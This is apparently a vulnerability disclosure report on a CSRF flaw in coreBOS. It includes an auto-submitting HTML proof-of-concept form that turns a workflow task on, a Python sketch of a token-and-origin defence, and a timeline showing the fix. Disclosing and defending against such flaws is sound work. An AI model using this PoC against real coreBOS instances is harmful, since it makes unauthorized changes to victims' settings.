Cross-Site Request Forgery (CSRF) in tsolucio/corebos

Valid

Reported on Oct 18th 2021


Description

There is one more low-level CSRF:

turning a workflow task on/off

<html>
  <body>
    <!-- rewrite the attacker page's URL so the Referer shows only its origin -->
    <script>history.pushState('', '', '/')</script>
    <!-- no method attribute: the request is sent as a plain GET -->
    <form action="http://ADDRESS/corebos/index.php">
      <input type="hidden" name="module" value="com&#95;vtiger&#95;workflow" />
      <input type="hidden" name="action" value="onofftask" />
      <input type="hidden" name="task&#95;id" value="38" />
      <input type="hidden" name="isactive" value="1" />
      <input type="hidden" name="return&#95;url" value="index&#46;php&#63;module&#61;com&#95;vtiger&#95;workflow&amp;action&#61;editworkflow&amp;workflow&#95;id&#61;37&amp;return&#95;url&#61;" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- submit automatically as soon as the victim loads the page -->
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
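The request above succeeds because nothing ties it to the victim's own session: it is a GET, it carries no anti-CSRF token, and the server does not look at where it came from. As an added defender-side illustration (not the reporter's PoC and not coreBOS's own fix), the guard below applies the synchronizer-token pattern to a request shaped like the PoC; the session layout, the `check_request` helper and the site origin `http://ADDRESS` are assumptions for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Hypothetical guard for state-changing coreBOS actions such as
# module=com_vtiger_workflow&action=onofftask. The request shape matches the
# report's PoC; the token handling is an assumed illustration, not coreBOS code.
STATE_CHANGING = {("com_vtiger_workflow", "onofftask")}


def new_session():
    """Constructed session: a fresh random token is minted when the user logs in."""
    return {"csrf_token": secrets.token_urlsafe(32)}


def render_token_field(session):
    """Hidden field a legitimate same-origin page would embed in its own form."""
    return f'<input type="hidden" name="csrf_token" value="{session["csrf_token"]}" />'


def check_request(session, method, headers, params, site_origin="http://ADDRESS"):
    """Return (allowed, reason) for one request; only guarded actions are checked."""
    if (params.get("module"), params.get("action")) not in STATE_CHANGING:
        return True, "not a guarded action"
    # The PoC form has no method attribute, so it arrives as a GET: refuse
    # state changes over GET outright.
    if method != "POST":
        return False, "state change attempted over GET"
    # If the browser sent Origin or Referer, it must name our own site.
    source = headers.get("Origin") or headers.get("Referer")
    if source is not None:
        u = urlsplit(source)
        if f"{u.scheme}://{u.netloc}" != site_origin:
            return False, f"cross-site source {u.scheme}://{u.netloc}"
    # Finally the per-session token must be present and match (constant time).
    sent = params.get("csrf_token", "")
    if not hmac.compare_digest(sent.encode(), session["csrf_token"].encode()):
        return False, "missing or wrong csrf_token"
    return True, "ok"
```

A forged copy of the PoC is rejected at the GET check; switching it to POST fails the origin check, and stripping the headers fails the token check, while the site's own form with the embedded token passes.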
Timeline

We have contacted a member of the tsolucio/corebos team and are waiting to hear back (2 years ago)
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. (2 years ago)
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. (2 years ago)
amammad modified the report (2 years ago)
amammad modified the report (2 years ago)
Joe Bordes validated this vulnerability (2 years ago)
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes marked this as fixed with commit 151c10 (2 years ago)
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE